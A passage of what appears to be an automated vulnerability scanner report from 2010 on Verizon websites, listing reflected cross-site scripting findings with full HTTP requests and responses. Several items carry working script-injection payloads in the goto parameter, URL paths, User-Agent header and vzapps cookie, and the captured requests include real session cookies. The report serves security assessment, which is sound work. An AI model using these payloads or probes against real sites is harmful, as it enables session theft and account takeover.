RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:41:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=KKCMJDFBHONCKMJLKPLHPKFD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128993

<!-- Vignette V6 Fri Nov 19 18:41:52 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
mopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?fcc6f";98476cbd401=1';
<!-- Vignette V6 Fri Nov 19 18:41:52 2010 -->
...[SNIP]...

3.132. https://www22.verizon.com/myverizon/ [goto parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5019"%3b15d2ffcfe11 was submitted in the goto parameter. This input was echoed as c5019";15d2ffcfe11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myverizon/?session=n&goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019"%3b15d2ffcfe11 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:44 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=PJJGEODCPLFPKBGNAFICECAB; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:44 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129009

<!-- Vignette V6 Fri Nov 19 18:15:43 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019";15d2ffcfe11';
<!-- Vignette V6 Fri Nov 19 18:15:44 2010 -->
...[SNIP]...

3.133. https://www22.verizon.com/myverizon/ [goto parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383dc"%3bf834175335c was submitted in the goto parameter. This input was echoed as 383dc";f834175335c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myverizon/?goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc"%3bf834175335c HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:10 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 129009

<!-- Vignette V6 Fri Nov 19 18:15:10 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc";f834175335c';
<!-- Vignette V6 Fri Nov 19 18:15:10 2010 -->
...[SNIP]...

3.134. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d8b"%3bdc8f525814c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98d8b";dc8f525814c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b"%3bdc8f525814c=1 HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7199
Date: Sat, 20 Nov 2010 03:04:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=NFJIEODCIOLCEPMOHFJNOAHN; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 03:09:34 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129020

<!-- Vignette V6 Fri Nov 19 19:04:33 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b";dc8f525814c=1';
<!-- Vignette V6 Fri Nov 19 19:04:33 2010 -->
...[SNIP]...

3.135. https://www36.verizon.com/FiOSVoice/members/CallsandMessages.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /FiOSVoice/members/CallsandMessages.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 575f9'%3b59cfc6b5eb6 was submitted in the REST URL parameter 2. This input was echoed as 575f9';59cfc6b5eb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2947
Expires: Sat, 20 Nov 2010 03:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:23 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=yx3n03emjvwwvqfejmdrmu55; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>Verizon FiOS&reg; Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset=
...[SNIP]...
<script type="text/javascript">
setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspx&SETTOPARENT=TRUE');
function getE(id){return document.getElementById(id);}
function setPage(URL){window.open(URL,'_top','',false);}
function PageHeight(){
browser_Ven=navig
...[SNIP]...

3.136. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12792</script><script>alert(1)</script>85d85e30042 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "a821b7c7c96c1edc411967617847d9ee"
Last-Modified: Sat, 20 Nov 2010 01:51:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 01:51:17 GMT
Connection: close
Set-Cookie: BERT=VRID%3d035c7296-52e1-4eea-beab-671dfdb451f1|VTID%3d45df8a3c-e08a-467b-9bd9-ee6969a25fcd|SX%3d1290219077|VP%3d1|RMC%3dxg|LP%3den; expires=Fri, 20 Nov 2015 06:55:01 GMT; domain=www.verizonbusiness.com; path=/
Expires: Thu, 19 Nov 2009 19:51:17 GMT
Content-Length: 28871

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
en", "flash2", "1000", "375", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042";
var q="<q>
...[SNIP]...

3.137. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab670<script>alert(1)</script>34458ec6bd8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab670<script>alert(1)</script>34458ec6bd8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68152
Expires: Sat, 20 Nov 2010 00:18:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:18:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXab670<script>alert(1)</script>34458ec6bd8; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAB670<SCRIPT>ALERT(1)</SCRIPT>34458EC6BD8 </DIV>
...[SNIP]...

3.138. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cddfb'><script>alert(1)</script>30cb0779e1a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcddfb'><script>alert(1)</script>30cb0779e1a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68156
Expires: Sat, 20 Nov 2010 00:18:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:18:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcddfb'><script>alert(1)</script>30cb0779e1a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDDFB'><SCRIPT>ALERT(1)</SCRIPT>30CB0779E1A ' />
...[SNIP]...

3.139. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b421a'><script>alert(1)</script>297c29e43fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb421a'><script>alert(1)</script>297c29e43fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61767
Expires: Sat, 20 Nov 2010 00:15:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=TXb421a'><script>alert(1)</script>297c29e43fb; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB421A'><SCRIPT>ALERT(1)</SCRIPT>297C29E43FB ' />
...[SNIP]...

3.140. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]

